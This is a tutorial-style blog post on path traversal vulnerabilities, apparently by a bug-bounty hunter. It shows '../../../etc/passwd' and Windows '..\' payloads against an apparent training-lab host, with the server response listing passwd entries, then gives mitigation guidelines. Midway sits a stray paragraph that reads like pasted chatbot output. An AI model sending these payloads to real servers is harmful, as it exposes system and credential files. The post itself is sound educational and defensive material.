Path traversal

🌐 Qasim Shah — Ethical Hacker

Meet Qasim Shah, a digital maestro navigating the intricate realms of cybersecurity with finesse and purpose. As an Ethical Hacker, Qasim is on a relentless quest to fortify the digital world against cyber threats, earning him the moniker of a modern-day guardian of the virtual realm.

💡 Today’s Insight: Path Traversal

Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application. This might include:

Application code and data.Credentials for back-end systems.Sensitive operating system files.

Required

To perform path traversal testing, you need a program with a responsible disclosure policy that allows testing their website and refrains from taking any illegal action against you. Additionally, you’ll require a proxy tool, such as Burp Suite.

Imagine a Victim application that displays images of items for sale. This might load an image using the following HTML:

<img src="/loadImage?filename=218.png">

The loadImage URL takes a filename parameter and returns the contents of the specified file. The image files are stored on disk in the location /var/www/images/. To return an image, the application appends the requested filename to this base directory and uses a filesystem API to read the contents of the file. In other words, the application reads from the following

/var/www/images/218.png

Capture the Request and Change it like

<https://insecure-website.com/loadImage?filename=../../../etc/passwd>

Example

GET /image?filename=../../../etc/passwd HTTP/2 Host: 0a09009c039d886480c0c64000320033.web-security-academy.net Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36

HTTP/2 200 OK Content-Type: image/jpeg Set-Cookie: session=Z9xgKRho6OvBxJdKCBkpniuMrBwCgO1c; Secure; HttpOnly; SameSite=None X-Frame-Options: SAMEORIGIN Content-Length: 2316

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

On Windows, both ../ and ..\\ are valid directory traversal sequences. The following is an example of an equivalent attack against a Windows-based server:

<https://insecure-website.com/loadImage?filename=>..\\..\\..\\windows\\win.ini

It appears there may be some confusion in your request. If you’re asking for information or guidance on the requirements for addressing path traversal vulnerabilities, I’d be happy to provide that. Path traversal is a security issue that occurs when an application allows an attacker to navigate outside the intended directory or access files and directories that should be restricted.

To mitigate path traversal vulnerabilities, consider the following general guidelines:

Input Validation:

Always validate and sanitize user input thoroughly.Implement strict input validation to ensure that user-supplied data doesn’t contain any unauthorized characters or sequences.

File Path Security:

Avoid directly using user input to construct file paths.Use platform-specific APIs and libraries for file manipulation to ensure secure file access.

Directory Whitelisting:

Maintain a whitelist of allowed directories and files.Restrict file access to only those paths specified in the whitelist.

Access Controls:

Implement proper access controls and permissions.Ensure that users or processes have the minimum necessary permissions to perform their tasks and access specific files or directories.

Use Canonicalization:

Employ file path canonicalization to convert paths to their standardized form.This helps in preventing variations in path representations that attackers might exploit.

Farewell, dear readers! I hope you’ve enjoyed exploring my blog. If there are any mistakes on my part, I sincerely apologize. Feel free to reach out with any questions or feedback, and I’ll be sure to respond. Happy hunting for knowledge and adventures!